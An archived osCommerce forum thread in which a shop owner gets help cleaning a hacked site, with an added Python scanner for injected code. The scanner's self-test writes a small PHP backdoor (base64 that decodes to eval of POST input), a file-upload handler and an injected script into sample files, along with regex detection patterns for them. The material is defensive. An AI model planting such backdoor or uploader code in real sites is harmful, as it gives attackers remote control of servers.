
Archived

This topic is now archived and is closed to further replies.

littleminx

Virus


Hi

Please can someone help me. I have recently had my website hacked. It's coming up in my AVG security as Trojan Horse Generic when I log in to my Admin section. I am fairly new to using osCommerce and my web designer is away for 2 weeks, and I haven't got a clue what to do, or where to start. All I know is that it is not allowing customers to log in, which is understandable, and also, as I have recently been updating the web, it keeps putting pictures into the incorrect categories and my prices have changed on different items. Please can someone help, as I haven't got a clue what to do and I have spent so much time on putting images etc. in and am afraid it's all being corrupted. :(


Leanne,

 

You will need to FIRE your web designer for NOT implementing the security patches and contributions required.

 

Second, you need to review all files to remove malicious code and anomalous files. THEN, read these two threads on how to secure your website. Admin Security and Website Security

 

If you are unable to complete this process on your own, I suggest you seek experienced help to clean and secure your website.

 

 

 

Chris



 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)


Hi Chris

 

Thanks for your reply.

 

I know it might sound silly to you, but when you say files, would that be under File Manager? And with regards to malicious files, how would I know what to look out for?

 

Is there a certain type of thing to look out for?

 

Thanks for your time...


Leanne,

 

If by file manager you mean the one in your cPanel, then YES. You can open and view your files from there. Malicious code typically will be 'eval base 64' encrypted code found in the file, or could also be a <script> malicious code </script> that is not encrypted. Anomalous files are files created by the hacker that are used to allow him access to your server and/or store. These are harder to identify, especially in your case where you had someone else create the site for you. But you can usually tell the difference between 'original' osCommerce code and other code.

 

These files sometimes appear as goog1e31256432321.php or similar files that make you think they are required files for your website.

 

 

Chris



 


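The indicators Chris lists above (eval/base64 code inside files, injected script blocks, look-alike filenames such as goog1e31256432321.php) can be checked mechanically instead of eyeballing every file in cPanel. The scanner below is an added example written for this page; it is not code from the thread or from osCommerce. The regexes, the "PHP under images/ is suspicious" rule and the sample files it builds in a temporary directory are this example's own constructions, not osCommerce files.

```python
"""Added example (not from the thread or from osCommerce): a small scanner for the
indicators the post above describes. The sample files it builds are constructed."""
import os
import re
import tempfile
import time

# Patterns typical of injected PHP/JS; labels and thresholds are this example's own choices.
CODE_PATTERNS = {
    "eval_base64": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
    "script_inject": re.compile(
        r"<script[^>]*>[^<]{0,400}(?:unescape|fromCharCode|document\.write)", re.I),
    "upload_handler": re.compile(r"move_uploaded_file\s*\(", re.I),
}
# Look-alike names such as goog1e31256432321.php (leetspeak 'google' plus digits).
LOOKALIKE_NAME = re.compile(r"^(?:goog1e|g00gle|google)\d+\.php$", re.I)


def scan_tree(root):
    """Return {relative_path: [reasons]} for every file that trips an indicator."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            parts = rel.split("/")
            reasons = []
            if LOOKALIKE_NAME.match(name):
                reasons.append("lookalike filename")
            # PHP under images/ has no business there: that directory should hold pictures only.
            if name.lower().endswith(".php") and "images" in parts[:-1]:
                reasons.append("php in images dir")
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            reasons += [label for label, pat in CODE_PATTERNS.items() if pat.search(text)]
            if reasons:
                findings[rel] = reasons
    return findings


def recently_modified(root, days=7, now=None):
    """Sorted relative paths of files whose mtime falls within the last `days` days."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.getmtime(full) >= cutoff:
                hits.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(hits)


def build_sample_site(base):
    """Constructed mini-tree: one clean file and three that mimic what the posts describe."""
    files = {
        "catalog/index.php": "<?php\n  require('includes/application_top.php');\n",
        "catalog/images/goog1e31256432321.php":
            "<?php eval(base64_decode('ZXZhbCgkX1BPU1RbJ2MnXSk7'));",
        "catalog/includes/footer.php":
            "<?php echo 'footer'; ?>\n<script>document.write(unescape('%3Ciframe%20src%3D'))</script>",
        "catalog/admin/up.php":
            "<?php if (isset($_FILES['f'])) move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']);",
    }
    for rel, content in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    # Age the legitimate file so the mtime view separates it from the injected ones.
    old = time.time() - 90 * 86400
    os.utime(os.path.join(base, "catalog/index.php"), (old, old))


def demo():
    """Build the sample tree and return (findings, recently modified files)."""
    base = tempfile.mkdtemp(prefix="osc_scan_")
    build_sample_site(base)
    return scan_tree(base), recently_modified(base, days=7)


if __name__ == "__main__":
    findings, recent = demo()
    for path, reasons in sorted(findings.items()):
        print(f"{path}: {', '.join(reasons)}")
    print("modified in the last 7 days:", recent)
```

Run it against a copy of the real document root (`scan_tree('/path/to/public_html')`) rather than the sample tree. Treat the output as a starting list, not a verdict: long base64 runs also appear in legitimate files (embedded images, some contributions), and a backdoor can be written without any of these strings, which is why the later replies recommend restoring from a known-clean backup rather than trusting a clean-up by hand.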

Just looking under the file manager now, and I'm looking at the most recently modified files so that it would give me a better understanding, and there is 1 file on there, .htaccess, 1,948 bytes, which I'm not sure whether it should be on there or not. I don't understand these hackers, because it's not as if they can get anything off my website other than mess my images etc. up; it's so frustrating.


Leanne,

 

I'm not an OSC expert or a coding expert, but I read the security posts every day to see what's going on, and there does seem to be an increasing number of sites being hacked.

 

From what I have read over the past 12 months or so, merely removing the google12345 etc. files will not be enough to stop the hackers getting back in; they may have hidden other code to give them a sneaky way back onto your site.

 

Unless you know what you are looking for, you may not find it, and should seek experienced help. Or you could wipe your site clean and restore a known clean backup.

 

Then, before going live again, do the security fixes discussed in this forum. Without them you will be exposed to more attacks.

 

For instance, I received 96 suspicious attempts at my site today from an IP in Russia; fortunately the security systems I have in place managed to stop access.

 

Good Luck


Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.



Hi

 

Thanks for your message. It's been a bit of a nightmare to be honest, as my web designer is away until the 1st, so I've tried finding out as much as I can from the more experienced. I found about 8 of those codes hidden yesterday and have removed them, but like you said they could be hidden anywhere. I'm on there looking now and have noticed that there is a Database Backup Manager section where it gives the option to either restore or delete. I'm a little unsure as to what to do. Also unsure whether it would remove any of the items that I have added to the web, as I have spent hours of work on there. But thanks for the advice anyway.


Leanne, usually a hacked web site does not affect the database, and that is what that backup/restore does. It only backs up and restores the database (rather poorly, at that). What you would need is a clean backup of the files in your web site: a complete set that is not infected. It is a bit of a chore to completely erase your site and restore it from a good set of backup files, but it is far easier for the inexperienced than a forensic search and cleaning of the hack.

 

Wiping the site and restoring your web site files will not affect the products you previously entered, or the orders you have taken, but it will likely remove any changes made to files along the way. Depending on when your backup was done, of course.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?


Thanks. It might seem a silly question to you, as I'm learning as I go. How do I get a clean backup of the files?

Only you can tell us that. The life span of your shop is the key. At some point in the past...

 

You downloaded OS Commerce - This is the oldest backup.

You installed OS Commerce

Did you ever make a backup?

You may have made edits or added contributions.

Did you make a backup?

Now you have been hacked - anything further would be infected....

 

 

Did you or your web developer ever make a backup? You could go all the way back to using the original downloaded package from the OS Commerce download area. That would mean that any edits you have done since original installation will be lost. On the other hand, the fact that you have been hacked makes me believe that you did not have many edits or contributions installed. You may not lose much if you reverted back to the original files, as long as you reinstall the same version.



Hi again,

 

I don't know who your host is, but they should be able to help, as most hosts run routine backups (mine does 4 per day).

 

You know you had some of the dodgy Google1234 files in your images directory; ask them to look for a backup that does not have these. That should then be a clean backup, in my view.



Thank you all for the advice; in the past couple of days I have learnt a lot. I have removed those files starting google1def2.php etc., as there were around 9 of them, but like you have all stated they are bound to have crept in somewhere else.

 

My web designer has a backup, so I will have to wait until they are back off vacation. Then I will put extra security on.

 

This has all been because I used a friend's laptop which, to my horror, appeared to have a Trojan virus on it, which I was not aware of. My PayPal account was also hacked at the same time by this email address (ebaybuyer@hushmail.com), so keep a look out for this email address, as I think this is possibly related to the hacker on my web.

 

Whereas my personal PC is full of security. Typical, hey!!

 

Thanks again for taking the time to give me advice...


Hi all,

This discussion is quite good...

I have only one remark, or rather a question.

 

I discovered 2 strange files in catalog which allow uploading other files and show the access data for MySQL.

So in this case, is it possible to upload into the database some code that caused the problems...

 

Thanks for your help

 

sorry for my English


If you found files on your site that you didn't put there then anything is possible.

 

The database and any file on the site might be compromised.


If I suggest you edit any file(s), make a backup first. I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 
